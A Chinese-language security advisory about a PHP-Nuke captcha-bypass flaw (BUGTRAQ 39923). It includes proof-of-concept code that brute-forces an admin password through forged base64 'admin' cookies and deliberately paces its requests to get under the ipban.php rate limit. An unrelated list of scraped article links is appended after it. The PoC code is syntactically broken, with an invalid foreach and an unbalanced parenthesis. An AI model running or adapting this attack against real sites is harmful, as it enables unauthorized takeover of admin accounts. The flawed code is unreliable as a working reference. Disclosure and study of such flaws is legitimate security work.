发布日期:2010-05-04

更新日期:2010-05-06

受影响系统:

PHP-Nuke PHP-Nuke 8.1.35

PHP-Nuke PHP-Nuke 8.1

PHP-Nuke PHP-Nuke 7.7

PHP-Nuke PHP-Nuke 7.0

描述:

--------------------------------------------------------------------------------

BUGTRAQ  ID: 39923

PHP-Nuke是一个广为流行的网站创建和管理工具,可使用很多数据库软件作为后端,如MySQL、PostgreSQL、mSQL、Interbase、Sybase等。

PHP-Nuke可配置为要求识别码才可以登录,以防范暴力猜测攻击。但用户可以在提交给Web服务器的POST请求中提供伪造的Cookie来绕过识别码验证,获得非授权访问。

测试方法:

--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

$http=new http();

$x=0;

foreach $wordlist as $pass{

$http->cookie="admin=".base64_encode($admin_name.":".md5($pass).":").";";

$resp=$http->send("http://127.0.0.1/admin.php");

if(!strstr($resp,"Administration System Login")){

break;

}

//This stays below ipban.php's rate limit of less than 5 requests per 2 seconds.

if(!($x%4)){

sleep(2);

}

$x++;

}

if(!strstr($resp,"Administration System Login"))){

print "password:$pass\n";

}else{

print "password not found\n"

}

建议:

--------------------------------------------------------------------------------

厂商补丁:

PHP-Nuke

--------

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

php绕过验证,PHP-Nuke绕过识别码验证漏洞相关推荐

  1. 渗透测试-文件上传漏洞之MIME type验证原理和绕过

    文件上传漏洞之MIME type验证原理和绕过 文章目录 文件上传漏洞之MIME type验证原理和绕过 前言 一.什么是MIME type 二.MIME type验证原理和绕过 1. MIME ty ...

  2. 使用DNS2TCP搭建DNS隧道,绕过网络认证,实现免验证上网

    使用DNS2TCP搭建DNS隧道,绕过网络认证,实现免验证上网 正常情况下,当我们连上酒店或者其他需要验证才可以使用的网络后,虽然上不了网,但是我们的计算机却分配到了IP地址(不分配IP地址web认证 ...

  3. 验证码绕过(对验证码绕过的理解-----burpsuite)

    Pikachu是一个带有漏洞的Web应用系统, 在这里包含了常见的web安全漏洞.通过一些资料认识这个练习的靶机平台.练习需要的条件是自己首先在电脑上下载并安装相关的工具.Burp suit.Phps ...

  4. 00截断上传绕过_上传绕过总结

    欢迎各位关注我的专栏,在以后的时间里,我将分享更多技术,在这里你能学到很多知识和姿势.自我介绍:高级安全研究员|擅长Python\PHP\JAVA审计;SONRT规则;etc.|陈小兵著<SQL ...

  5. 计算机用电子表格验证方案,Excel电子表格的验证1.PDF

    Excel电子表格的验证1.PDF IZ STUDIO IZ STUDIO OMCL 指南:计算机化系统验证 附录 1:Excel 电子表格的验证 1 Excel 电子表格的验证 注:本指南及其附录中 ...

  6. 机器学习(MACHINE LEARNING)交叉验证(简单交叉验证、k折交叉验证、留一法)

    文章目录 1 简单的交叉验证 2 k折交叉验证 k-fold cross validation 3 留一法 leave-one-out cross validation 针对经验风险最小化算法的过拟合 ...

  7. yii 验证器类 细说YII验证器

    在 yii-1.1.10.r3566 版本中,yii自带的验证器共有 19 个.全部如下: // CValidator.php public static $builtInValidators=arr ...

  8. sencha touch Model validations 自定义验证 二选一输入验证、重复验证、时间验证、比较验证、条件验证(2015-1-14)...

    项目初始化时执行以下代码 1 //重写模型,方便进行自定义验证 2 Ext.define("Ext.zh.data.Model", { 3 override: "Ext. ...

  9. 【转】ASP.NET验证控件详解(非空验证,比较验证,范围验证,正则表达式,自定义验证)...

    [转]ASP.NET验证控件详解(非空验证,比较验证,范围验证,正则表达式,自定义验证) ASP.NET验证控件详解 现在ASP.NET,你不但可以轻松的实现对用户输入的验证,而且,还可以选择验证在服 ...

最新文章

  1. 从特急到难产 光伏增补项目抢不抢630?
  2. 学习web前端你必须要了解的主流框架!
  3. Nature癌症“牵线木偶”理论:科学家找到了不易误伤健康细胞的“剪刀”
  4. cookie共享子域名
  5. Manjaro 安装笔记
  6. 决策树-特征属性选择划分
  7. 纽约州立大学石溪分校将理论物理研究所命名为“杨振宁理论物理研究所”
  8. Spring配置文件总结
  9. 关于文件的工具类例子
  10. Ubuntu平台采用Qemu搭建ARM虚拟机环境
  11. 13种常见软件体系结构风格定义分析、结构图、优缺点
  12. plsql导出数据字典
  13. 盘点前端开发常用的几款编辑器
  14. C语言-求绝对值-三目运算符
  15. 用wait¬ify实现多线程才是正确打开方式
  16. CSS系列之连续的字母或数字在Html盒子中不会自动换行,直接溢出
  17. 安卓盒子launcher界面开发之添加自动定位,获取当地天气
  18. Linux: fPIC与 pie 区别
  19. 结果集没有当前行的解决方法
  20. 图像分类篇——AlexNet详解

热门文章

  1. JS操作保存cookie(转载他人)
  2. 嘿嘿~~大家一起来测测自己反映速度
  3. Springboot2.0 集成 Elasticsearch 6.x 未添加 transport-netty4-client 依赖 启动时报错
  4. oracle dblink和dataguard,Oracle 建立 DBLINK
  5. c语言十六实验答案,《C语言》上机实验题及参考答案
  6. Hadoop1和Hadoop2的区别是什么?
  7. redis中各种数据类型对应的jedis操作命令
  8. Oracle 计划新的移动 OpenJDK 项目
  9. 列表页的动态条件搜索
  10. Pattern类与Matcher方法的验证